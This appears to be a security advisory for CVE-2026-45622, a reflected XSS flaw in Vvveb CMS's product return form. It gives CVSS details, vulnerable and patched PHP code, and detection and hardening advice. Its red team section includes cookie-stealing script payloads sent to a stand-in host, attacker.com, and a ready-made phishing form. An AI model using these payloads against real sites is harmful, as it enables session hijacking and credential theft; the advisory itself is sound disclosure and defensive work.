CVE-2026-45622
Executive Summary
CVE-2026-45622 is an unauthenticated reflected Cross-Site Scripting (XSS) vulnerability in Vvveb CMS versions prior to 1.0.8.3. The flaw exists in the public product return form, where the customer_order_id POST parameter is reflected into an error message without proper HTML escaping. An attacker can craft a malicious link or form submission that, when clicked by a victim, executes arbitrary JavaScript in the context of the Vvveb CMS domain. This can lead to session hijacking, credential theft, or defacement. The vulnerability is fixed in version 1.0.8.3.

Supply Chain & Package Security
This vulnerability affects the Vvveb CMS PHP application. While not a package manager ecosystem (NPM/PyPI/Go/Ruby), the risk is elevated due to the unauthenticated nature of the attack vector. Organizations using Vvveb CMS should treat this as a critical supply chain security issue and immediately update to the patched version.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Base Score: 6.1 (Medium)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: None (PR:N)
- User Interaction: Required (UI:R)
- Scope: Changed (S:C)
- Confidentiality Impact: Low (C:L)
- Integrity Impact: Low (I:L)
- Availability Impact: None (A:N)
Threat Level: Medium. The vulnerability requires user interaction (clicking a link or submitting a form), but no authentication is needed. The impact is limited to the victim's browser session.
Deep Dive & Mechanics
The vulnerability resides in the public product return form endpoint. When a user submits a return request, the application looks up the order by the customer_order_id POST parameter. If the order is not found, the application constructs an error message: Order %s not found!, where %s is replaced with the raw value of customer_order_id. This message is then rendered in the frontend template without any HTML escaping.
Attack Flow:
- An attacker crafts a URL or form that submits a POST request to the vulnerable endpoint with a malicious
customer_order_idparameter, e.g.,<script>alert('XSS')</script>. - The victim clicks the link or submits the form (e.g., via phishing).
- The server returns an HTML page containing the error message with the unescaped script.
- The victim's browser executes the attacker's JavaScript.
Root Cause: The application uses sprintf or similar string formatting to insert the user input into the error message, but fails to apply htmlspecialchars() or equivalent escaping before output.
Vulnerable vs. Patched Code
Vulnerable Code (prior to 1.0.8.3):
// In the return form handler
$order_id = $_POST['customer_order_id'];
// ... lookup fails ...
$error_message = sprintf('Order %s not found!', $order_id);
// Output without escaping
echo $error_message;
Patched Code (1.0.8.3):
// In the return form handler
$order_id = $_POST['customer_order_id'];
// ... lookup fails ...
$error_message = sprintf('Order %s not found!', htmlspecialchars($order_id, ENT_QUOTES, 'UTF-8'));
// Output with escaping
echo $error_message;
The fix applies htmlspecialchars() to the $order_id before inserting it into the error message, preventing HTML/JavaScript injection.
Exploitation & Lab Setup
Red Team (Exploitation)
Proof of Concept (PoC):
- Set up a local Vvveb CMS instance (version < 1.0.8.3).
- Navigate to the public product return form (e.g.,
/index.php?module=returns/return). - Submit the form with the following payload in the
customer_order_idfield:<script>alert(document.cookie)</script> - Observe that the script executes in the browser.
Advanced Payload (Session Hijacking):
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
Phishing Link:
<form action="http://target.com/index.php?module=returns/return" method="POST">
<input type="hidden" name="customer_order_id" value='<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'>
<input type="submit" value="Click me">
</form>
Blue Team (Detection & Hardening)
Detection:
- Monitor web server logs for POST requests to the return form endpoint with suspicious
customer_order_idvalues containing<script>,onerror=, or other HTML event handlers. - Use WAF rules to block requests where
customer_order_idcontains HTML tags.
Hardening:
- Immediately upgrade to Vvveb CMS 1.0.8.3 or later.
- If upgrade is not possible, apply a virtual patch by adding a WAF rule to sanitize the
customer_order_idparameter. - Implement Content Security Policy (CSP) headers to mitigate XSS impact.
Indicators of Compromise (IOCs)
Network IOCs:
- POST requests to
/index.php?module=returns/returnwithcustomer_order_idcontaining<script>oron*event handlers. - Outbound connections to attacker-controlled domains from the victim's browser (e.g.,
attacker.com/steal).
- POST requests to
File IOCs:
- Modified or injected JavaScript in browser storage (localStorage, sessionStorage) or cookies.
- Unexpected entries in web server access logs with encoded XSS payloads.
Behavioral IOCs:
- Unusual error messages containing HTML tags in the return form.
- Users reporting unexpected pop-ups or redirects after using the return form.

Remediation & Mitigation
Immediate Actions:
- Upgrade: Update Vvveb CMS to version 1.0.8.3 or later immediately.
- Virtual Patching: If upgrade is delayed, deploy a WAF rule to block requests containing
<script>or other HTML tags in thecustomer_order_idparameter. - CSP Implementation: Add a Content Security Policy header to mitigate XSS impact:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
Long-Term Measures:
- Conduct a code review to ensure all user inputs are properly escaped before output.
- Implement input validation to reject HTML tags in order IDs.
- Enable HTTP-only and Secure flags on session cookies.
- Regularly update all CMS components and plugins.
